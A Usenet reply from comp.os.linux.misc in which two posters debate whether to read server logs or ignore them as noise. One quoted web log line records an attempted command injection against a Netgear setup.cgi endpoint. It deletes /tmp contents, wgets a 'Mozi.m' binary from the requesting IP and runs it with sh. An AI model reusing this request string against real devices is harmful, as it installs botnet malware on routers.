Path: csiph.com!fu-berlin.de!uni-berlin.de!individual.net!not-for-mail From: "Carlos E. R." Newsgroups: comp.os.linux.misc Subject: Re: Is It Time To Replace SSH ??? Date: Mon, 19 Dec 2022 00:59:33 +0100 Lines: 35 Message-ID: References: <87r0x0xmre.fsf@usenet.ankman.de> <87mt7mwyvl.fsf@usenet.ankman.de> <871qoywh67.fsf@usenet.ankman.de> <875ye9v7ho.fsf@usenet.ankman.de> <87sfhcs29e.fsf@usenet.ankman.de> Mime-Version: 1.0 Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 7bit X-Trace: individual.net pB5MQYuJieOVwYmiUk1Ldw3nDAbf1UL9zUKs6XXam7w6+x4CB8 Cancel-Lock: sha1:HWm7JK2rKrAtp9HGjijiNKBKE9o= User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Thunderbird/102.5.1 Content-Language: es-ES, en-CA In-Reply-To: <87sfhcs29e.fsf@usenet.ankman.de> Xref: csiph.com comp.os.linux.misc:36545 On 19/12/2022 00.47, Andreas Kohlbach wrote: > On Sun, 18 Dec 2022 23:35:23 +0100, Carlos E. R. wrote: >> >> On 18/12/2022 02.13, Andreas Kohlbach wrote: >>> >>> I was referring to "can fill the filesystem". >> >> Yes, rotating logs takes care of that. But the issue of too much noise >> remains. > > The typical Linux user of today can ignore the noise. Ignore your logs, > unless you feel something is not right. I work the other way: I check the logs to see if there is something wrong :-) > Same with (my) web server. Again, I do not offer a commercial > service. Thus I not often look into the logs and let logrotate taking > care of compressing and later get rid of logs. > > Ever so often I check for "200 " to see who had success, and shuckle > about things like > > 190.180.154.158 - - [18/Dec/2022:12:02:10 -0500] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://190.180.154.158:38147/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 341 "-" "-" > > in the log. Yes, I could block 190.180.154.158 or a netblock around > it. But why? It's just noise I choose to ignore. Each one has their methods :-) -- Cheers, Carlos E.R.